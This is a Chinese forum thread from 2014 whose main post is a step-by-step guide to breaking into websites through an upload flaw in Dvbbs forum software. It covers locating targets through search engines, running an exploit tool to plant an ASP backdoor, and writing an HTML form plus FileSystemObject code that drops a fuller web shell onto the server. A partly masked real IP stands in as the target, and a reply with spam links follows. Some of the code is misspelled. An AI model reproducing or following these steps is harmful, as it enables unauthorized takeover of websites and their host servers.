找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1359|回复: 1

如何利用动网论坛漏洞入侵网站

[复制链接]
已绑定手机

155

主题

-12

回帖

631

牛毛

一级牛人

积分
631
QQ
发表于 2014-8-21 16:27:07 | 显示全部楼层 |阅读模式 来自 广东省东莞市
动网论坛从出名的那天起,关于它的漏洞就不断出现。它的上传文件upfile.asp中的代码就存在漏洞,可以构造虚假数据,从而欺骗代码本身的限制。利用此漏洞可达到上传asp后门的目的,从而控制整个网站甚至网站所在的主机。具体操作:
     一、测试目标。借助百度搜索:E度阳光论坛(它是动网论坛的一个美化版本),从中随便打开一个看看它的上传文件名是否更改,输入地址:http://218.**.**.**/mir2/bbs/upfile.asp,如果看到提示:请先选择你要上传的文件[重新上传],说明此论坛未做防范措施,那么就可以测试了!
     二、利用explot:exp.exe上传木马。在$Host=下输入要测试论坛的根路径:http://218.**.**.**/mir2/,然后确认,exploit提示输入传输端口,输入80,再确认,在$way=中输入论坛的具体文件夹:/bbs/,确认。这个程序就可开始利用漏洞向指定论坛上传内置asp木马,地址为:http://218.**.**.**/mir2/bbs/ uploadface/a s p. a s p,看到一片空白就说明已经成功了,这就是已上传木马的显示状态。
     三、打开记事本,输入以下代码:   <form action=http://218.**.**.**/mir2/bbs/uploadface/asp.asp method=post>
     <textarea name=a cols=80 rows=10 width=32>
    response.write
server.mappath(request.servervariables("SCRIPT_NAME"))  </textarea>
    <trxtarea name=b cols=80 rows=10 width=32></textarea>
    <input type=submit value=运行>
    </form>
    然后保存为heidan.html,
     打开heidan.html,可以看到一个本地提交的简单页面,点击“运行”按钮可看到显示结果为:d:\mir2,这个目录就是存在目标网站web文件的文件夹。
     四、利用已经上传的asp木马上传一些功能更为强大的asp木马,以海洋顶端木马为例:
     同样打开heidan.html,在上面的文本框中输入代码:
     set objfso=server.createobject("seripting.filesystemobject")
     fdata=request("b")
     set objcountfile=objfso.createtextfile("d:\mir2\mm.asp",true)
    objcountfile.writ fdata
     用记事本打开海洋顶端木马,将代码复制下来,粘贴在下面的文本框中,提交,当提示成功之后,打开已经上传海洋顶端木马的地址:http://218.**.**.**/mir2/mm.asp,可以看到已经上传成功。一切尽在掌握之中。

8

主题

53

回帖

26

牛毛

初生牛犊

积分
26
发表于 2015-7-9 11:58:47 | 显示全部楼层 来自 柬埔寨
说的很好,感谢楼主无私的分享
www.66***78.info
www.xxkuaibo.com
www.wooguu.com
www.hg0080.info
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5用户社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-10 18:54 , Processed in 0.122999 second(s), 32 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表